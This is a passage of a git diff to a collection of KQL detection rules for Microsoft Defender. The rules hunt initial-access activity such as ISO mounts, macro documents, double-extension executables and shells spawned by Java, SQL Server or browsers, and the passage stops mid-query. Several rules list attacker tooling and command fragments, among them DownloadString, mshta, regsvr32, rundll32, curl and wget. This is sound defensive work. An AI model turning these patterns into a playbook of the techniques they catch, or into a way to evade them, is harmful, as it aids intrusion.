-// - Cases in which a user mounts an image file for legitimate reasons
-
-DeviceFileEvents
+// Title: ISO or Image Mount Indicator in Recent Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
+// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Cases in which a user mounts an image file for legitimate reasons
+
+DeviceFileEvents
 | where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/octopus_scanner_malware.kql b/KQL/rules/Initial Access/octopus_scanner_malware.kql
index 9ec9586d..ac84e02e 100644
--- a/KQL/rules/Initial Access/octopus_scanner_malware.kql
+++ b/KQL/rules/Initial Access/octopus_scanner_malware.kql
@@ -1,10 +1,10 @@
-// Title: Octopus Scanner Malware
-// Author: NVISO
-// Date: 2020-06-09
-// Level: high
-// Description: Detects Octopus Scanner Malware.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1195, attack.t1195.001
-
-DeviceFileEvents
+// Title: Octopus Scanner Malware
+// Author: NVISO
+// Date: 2020-06-09
+// Level: high
+// Description: Detects Octopus Scanner Malware.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1195, attack.t1195.001
+
+DeviceFileEvents
 | where FolderPath endswith "\\AppData\\Local\\Microsoft\\Cache134.dat" or FolderPath endswith "\\AppData\\Local\\Microsoft\\ExplorerSync.db"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/office_macro_file_creation.kql b/KQL/rules/Initial Access/office_macro_file_creation.kql
index cee346c6..baaec717 100644
--- a/KQL/rules/Initial Access/office_macro_file_creation.kql
+++ b/KQL/rules/Initial Access/office_macro_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: Office Macro File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-23
-// Level: low
-// Description: Detects the creation of a new office macro files on the systems
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-// False Positives:
-// - Very common in environments that rely heavily on macro documents
-
-DeviceFileEvents
+// Title: Office Macro File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the systems
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Very common in environments that rely heavily on macro documents
+
+DeviceFileEvents
 | where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql
index 84f15830..9640ab1d 100644
--- a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql
+++ b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql
@@ -1,10 +1,10 @@
-// Title: Office Macro File Creation From Suspicious Process
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-23
-// Level: high
-// Description: Detects the creation of a office macro file from a a suspicious process
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-
-DeviceFileEvents
+// Title: Office Macro File Creation From Suspicious Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: high
+// Description: Detects the creation of a office macro file from a a suspicious process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceFileEvents
 | where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/Initial Access/office_macro_file_download.kql
index 8a198700..8ffca814 100644
--- a/KQL/rules/Initial Access/office_macro_file_download.kql
+++ b/KQL/rules/Initial Access/office_macro_file_download.kql
@@ -1,14 +1,14 @@
-// Title: Office Macro File Download
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-23
-// Level: low
-// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client).
-// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-// False Positives:
-// - Legitimate macro files downloaded from the internet
-// - Legitimate macro files sent as attachments via emails
-
-DeviceFileEvents
+// Title: Office Macro File Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client).
+// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Legitimate macro files downloaded from the internet
+// - Legitimate macro files sent as attachments via emails
+
+DeviceFileEvents
 | where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql
index 633e7e3c..995ff0e8 100644
--- a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql
+++ b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql
@@ -1,12 +1,12 @@
-// Title: Phishing Pattern ISO in Archive
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-06-07
-// Level: high
-// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566
-// False Positives:
-// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction
-
-DeviceProcessEvents
+// Title: Phishing Pattern ISO in Archive
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-07
+// Level: high
+// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566
+// False Positives:
+// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql
index 7ab0fb11..f2a05efe 100644
--- a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql
+++ b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution
-// Author: Jason Rathbun (Blackpoint Cyber)
-// Date: 2024-02-26
-// Level: high
-// Description: Detects potential web shell execution from the ScreenConnect server process.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution
+// Author: Jason Rathbun (Blackpoint Cyber)
+// Date: 2024-02-26
+// Level: high
+// Description: Detects potential web shell execution from the ScreenConnect server process.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
index a78e1886..6f0b3b69 100644
--- a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
+++ b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
@@ -1,10 +1,10 @@
-// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension
-// Author: frack113
-// Date: 2021-12-28
-// Level: high
-// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.persistence, attack.t1133
-
-DeviceRegistryEvents
+// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension
+// Author: frack113
+// Date: 2021-12-28
+// Level: high
+// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.t1133
+
+DeviceRegistryEvents
 | where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains 
"lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey 
contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or 
RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql
index 6c1c13cf..25e4e948 100644
--- a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql
+++ b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql
@@ -1,13 +1,13 @@
-// Title: Shell Process Spawned by Java.EXE
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021-12-17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
-// False Positives:
-// - Legitimate calls to system binaries
-// - Company specific internal usage
-
-DeviceProcessEvents
+// Title: Shell Process Spawned by Java.EXE
+// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
+// Date: 2021-12-17
+// Level: medium
+// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+// - Legitimate calls to system binaries
+// - Company specific internal usage
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql
index 4d6b1c5f..384b570f 100644
--- a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql
+++ b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Browser Child Process - MacOS
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-04-05
-// Level: medium
-// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059
-// False Positives:
-// - Legitimate browser install, update and recovery scripts
-
-DeviceProcessEvents
+// Title: Suspicious Browser Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-04-05
+// Level: medium
+// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059
+// False Positives:
+// - Legitimate browser install, update and recovery scripts
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/osascript" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/pwsh" or FolderPath endswith "/python" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/wget" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath contains "com.apple.WebKit.WebContent" or InitiatingProcessFolderPath contains "firefox" or InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome" or InitiatingProcessFolderPath contains "Microsoft Edge" or InitiatingProcessFolderPath contains "Opera" or InitiatingProcessFolderPath contains "Safari" or InitiatingProcessFolderPath contains "Tor Browser")) and (not(((((ProcessCommandLine contains "/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/" and ProcessCommandLine 
contains "/Resources/install.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_preflight.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_postflight.sh")) and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Application Support/Google/Chrome/recovery/" and ProcessCommandLine contains "/ChromeRecovery") and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ProcessCommandLine contains "--defaults-torrc" or ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*" or ((ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "hw.model") and InitiatingProcessFolderPath contains "Microsoft Edge")))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql
index 685c4387..2ba63c98 100644
--- a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql
+++ b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Child Process Of SQL Server
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020-12-11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// MITRE Tactic: Initial Access
-// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
-
-DeviceProcessEvents
+// Title: Suspicious Child Process Of SQL Server
+// Author: FPT.EagleEye Team, wagga
+// Date: 2020-12-11
+// Level: high
+// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql
index 46b851ed..fb29b870 100644
--- a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql
+++ b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Child Process Of Veeam Dabatase
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
-
-DeviceProcessEvents
+// Title: Suspicious Child Process Of Veeam Dabatase
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: critical
+// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql
index f4bcc899..bf4ad443 100644
--- a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql
+++ b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Double Extension File Execution
-// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-06-26
-// Level: high
-// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-
-DeviceProcessEvents
+// Title: Suspicious Double Extension File Execution
+// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-06-26
+// Level: high
+// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".gif.exe" or ProcessCommandLine contains ".jpeg.exe" or ProcessCommandLine contains ".jpg.exe" or ProcessCommandLine contains ".mkv.exe" or ProcessCommandLine contains ".mov.exe" or ProcessCommandLine contains ".mp3.exe" or ProcessCommandLine contains ".mp4.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".png.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".svg.exe" or 
